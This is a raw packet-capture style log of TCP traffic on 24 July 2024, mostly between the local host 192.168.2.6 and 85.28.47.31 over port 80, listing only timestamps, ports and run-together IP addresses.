                                                                                        Jul 24, 2024 07:14:19.929692984 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.929706097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.929717064 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.929739952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.929769039 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.929791927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930200100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.930253029 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.930254936 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930286884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.930301905 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930325985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.930332899 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930361032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.930371046 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930394888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.930428028 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.930438042 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930459023 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930466890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.930476904 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930572033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.930613995 CEST49705443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:19.930706024 CEST49705443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:19.931227922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931262016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931291103 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.931294918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931328058 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.931330919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931346893 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.931365013 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931391954 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.931399107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931412935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.931432009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931463003 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.931467056 CEST49716443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:19.931476116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931484938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.931504011 CEST44349716173.222.162.64192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.931570053 CEST49716443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:19.931571007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.932203054 CEST49716443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:19.932221889 CEST44349716173.222.162.64192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.932446003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.932496071 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.932498932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.932534933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.932540894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.932569981 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.932576895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.932604074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.932615995 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.932638884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.932667017 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.932672024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.932682037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.932722092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933027983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933063984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933087111 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933095932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933108091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933130980 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933146000 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933166027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933182955 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933209896 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933583975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933600903 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933615923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933630943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933640003 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933645964 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933659077 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933662891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933679104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933686018 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933693886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.933697939 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933727980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.933738947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.934541941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.934559107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.934573889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.934590101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.934595108 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.934606075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.934621096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.934623003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.934643030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.934648037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.934658051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.934665918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.934696913 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935487986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935504913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935519934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935532093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935535908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935549974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935560942 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935566902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935579062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935583115 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935596943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935606956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935614109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935625076 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935631037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.935641050 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935657024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.935673952 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.936383009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936399937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936414957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936429977 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936434984 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.936445951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936450005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.936463118 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936475992 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.936477900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936500072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936501980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.936513901 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.936526060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.936563015 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.937131882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.937150002 CEST44349705173.222.162.64192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.937163115 CEST44349705173.222.162.64192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.937181950 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014199972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014273882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014312983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014347076 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014362097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014362097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014383078 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014395952 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014396906 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014416933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014427900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014455080 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014461994 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014602900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014641047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014693022 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014792919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014827013 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014844894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014862061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014868975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014898062 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.014914036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.014950037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.015249014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.015299082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.015311956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.015332937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.015353918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.015367031 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.015398026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.015399933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.015434027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.015454054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.015466928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.015491009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.015513897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.016201019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016235113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016264915 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.016267061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016287088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.016302109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016320944 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.016333103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016366959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016386986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.016401052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016417027 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.016433954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016467094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.016489029 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.016611099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.017107010 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.017138958 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.017165899 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.017173052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.017205000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.017227888 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.017239094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.017256021 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.017271996 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.017296076 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.017306089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.017339945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.017357111 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.017517090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.018105030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.018137932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.018162012 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.018172026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.018198013 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.018204927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.018215895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.018238068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.018265009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.018273115 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.018290997 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.018306971 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.018328905 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.018340111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.018393040 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.018976927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019011021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019040108 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019043922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019059896 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019077063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019097090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019109011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019134045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019144058 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019156933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019177914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019197941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019212008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019232988 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019243956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019263983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019293070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019848108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019882917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019908905 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019916058 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019926071 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019951105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.019968987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.019985914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020010948 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020019054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020028114 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020052910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020068884 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020103931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020745993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020780087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020809889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020812035 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020831108 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020845890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020847082 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020878077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020896912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020911932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020920038 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020945072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020968914 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.020978928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.020986080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021012068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021025896 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021063089 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021492004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021527052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021559954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021588087 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021593094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021609068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021625996 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021660089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021675110 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021693945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021727085 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021744967 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021759987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021774054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021794081 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.021831036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.021851063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.022469997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022506952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022531033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.022540092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022555113 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.022572994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022608042 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022629976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.022640944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022646904 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.022674084 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022707939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022725105 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.022741079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022762060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.022775888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.022828102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.023400068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023433924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023451090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023467064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023482084 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023484945 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.023497105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023503065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.023513079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023525953 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.023529053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023544073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023559093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.023562908 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.023583889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.023602009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.024391890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.024409056 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.024425030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.024451971 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.024452925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.024468899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.024486065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.024493933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.024508953 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.024508953 CEST4971180192.168.2.685.28.47.31
